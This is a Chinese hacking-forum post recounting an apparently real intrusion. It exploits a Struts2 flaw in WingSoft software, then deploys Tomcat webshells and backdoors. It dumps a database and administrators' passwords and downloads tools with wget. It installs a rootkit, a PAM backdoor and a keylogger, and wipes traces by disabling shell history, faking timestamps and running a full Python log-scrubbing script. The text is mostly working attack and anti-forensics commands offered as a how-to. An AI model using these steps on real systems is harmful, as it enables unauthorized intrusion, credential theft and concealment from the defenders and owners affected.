本文首發習科:地址http://bbs.blackbap.org/thread-7483-1-1.html
最近內網權限掉了, 需要重新找外網的入口進內網, 用鳳凰掃描器生成字典掃了一下弱口令,人肉查看了c段上的一些web, 掃了掃端口,發現13這台機器上跑了一個wingsoft的軟件, 在烏雲上找到了一個漏洞, 用st2 -005 漏洞得到了可以遠程執行命令的權限 0x02 進入邊界服務器 執行 unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0 復制代碼 使系統不記錄我們的操作記錄 用默認的工具上不去webshell,看了下web目錄, chmod 777 +r /js/ 加了可寫權限, 依然webshell上不去, 使用wget -O /web/js/help.jsp www.xxx.com/shell.txt 也寫入不了文件 執行 locate tomcat-user.xml cat /mulu/tomcat-user.xml 復制代碼 找到密碼以后進入tomcat后台,部署war包獲取webshell, 進去了以后,部署一句話后門若干, 並修改掉文件創建的時間,開始在webshell 上收集信息,為內網滲透做准備 netstat -tlnp //查看內網連過來那些端口 復制代碼10.19.1.56 10.19.1.66 192.168.1.184 10.19.1.150 10.22.1.222 10.22.1.249 [size=14.399999618530273px]10.22.1.249 翻一番配置文件。找數據庫在10.48.14.52 網段連接進去把褲子拖出來, 查找管理員的密碼, 翻到3個管理員(*陳,劉*,彭*) 記錄下他的密碼,看了下 python -h nmap -h 發現環境里有python環境 復制代碼 上insightscan.py 去掃描下 然而報錯了(然而並沒有掃描卵用),上傳鳳凰掃描器准備增加一點權限, 上傳出錯, 采用文件下載的方式 wget -O /tmp/xx.zip http://www.baidu.com/xx.zip unzip /tmp/xx.zip chmod 777 ff ./ff --參數 復制代碼提示缺少動態連接褲 (tmux: error while loading shared libraries: libevent-1.4.so.2: cannot open shared object file: No such file or directory )百度了一下 原因一般有兩個, 一個是操作系統里確實沒有包含該共享庫(lib*.so.*文件)或者共享庫版本不對, 遇到這種情況那就去網上下載並安裝上即可. 另外一個原因就是已經安裝了該共享庫, 但執行需要調用該共享庫的程序的時候, 程序按照默認共享庫路徑找不到該共享庫文件. 參考連接:http://www.jb51.net/article/35383.htm 0x03 權限維持 (1)安裝rootkit 安裝的應用級的rootkit,基本就是一個加密的nc,配置好端口 root 和密碼就可以了 (2)安裝pam后門記錄root密碼 本地是root權限,我們需要本地的root密碼,在/etc/shadow解密不了的情況下, 可以安裝pam后門或者ssh后門記錄root密碼 獲取pam版本:rpm -qa|grep pam 復制代碼 參考:http://www.freebuf.com/articles/system/24104.html http://www.nxadmin.com/system/1199.html (3)安裝keyloger https://github.com/dorneanu/ixkeylog/ 0x04 日志清理 (1) web日志的清理 awk '!/123.123.123.123|111.111.111.111|phpspy.php/' /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log 復制代碼touch -amt 200901231532 文件名 這樣把時間改回來 當然 也有批量修改時間的小技巧 ls|xargs touch -amt 200901231532 #這句話就可以直接改時間 復制代碼 (2)系統日志的清理 用的是王子牛的python腳本 #!/usr/bin/env python import os , sys , subprocess def banner(): print ''' This is linux log clear script \n Welcome to www.90sec.org\n Python log.py 127.0.0.1\n By:Mr,PriNce''' try: host = sys.argv[1] if len(sys.argv) < 1: banner log = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var/log/apache2/error.log.1","/usr/local/httpd/error.log","/apache/apache/message.log","/var/log/apache2/access_log","/var/log/apache2/error.log","/var/log/apache2/error_log ","/var/log/apache/access.log","/var/log/apache/access_log","/var/log/apache/error.log","/var/log/apache/error_log","/var/www/logs/error_log"," /var/www/logs/error.log"," /var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log"," /usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/usr/local/apache/logs/error_logerror_log.old","/usr/local/apache/logs/access_logaccess_log.old","/var/log/access.log","/var/log/access_log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access.log","/var/log/messages.1","/var/log/messages.2","/var/log/messages.3","/var/log/messages.4","/var/log/secure.1","/var/log/secure.2","/var/log/secure.3","/var/log/secure.3","/var/log/secure.4"] for line in log: if os.path.exists(line): subprocess.call("sed -i '/%s/d' %s" % (host , line),shell=True) print "[+]: %s " % (line) else: print "[-]: %s " % (line) except Exception: banner() 復制代碼 來習科這么久了 , 也為習科寫篇文章,未完待續, 內網有2個域,現在還在第一個域徘徊,還沒拿到域控權限, 未完待續把。。。